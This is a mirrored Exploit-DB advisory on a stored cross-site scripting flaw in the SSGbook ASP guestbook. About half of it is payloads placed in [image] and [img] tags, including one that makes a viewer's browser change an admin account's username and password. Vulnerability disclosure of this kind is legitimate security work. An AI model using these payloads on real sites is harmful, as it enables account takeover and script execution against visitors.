exploit-db-mirror/exploits/asp/webapps/21914.txt

source: https://www.securityfocus.com/bid/5915/info

SSGbook includes codes for allowing users to specify HTML formatting and layout inside of guestbook entries. For example, a user can include an image by including it inside of [image] or [img] tags. However, arbitrary HTML and script code are not sufficiently sanitized within these tags.

As a result, users may include malicious HTML and script code inside of guestbook entries. The attacker-supplied code will be rendered in the web client of a user who views a malicious guestbook entry. 

[image]javascript:{SCRIPT}[/image]

[img=right]javascript:{SCRIPT}[/img=right]

[image=right]javascript:{SCRIPT}[/image=right]

[img=left]javascript:{SCRIPT}[/img=left]

[image=left]javascript:{SCRIPT}[/image=left]

[img]javascript:{SCRIPT}[/img]

[image]javascript:document.location="ss_admin.asp?Mode=Update&Acton=Access&UserName=Pom&Password=turlututu";[/image]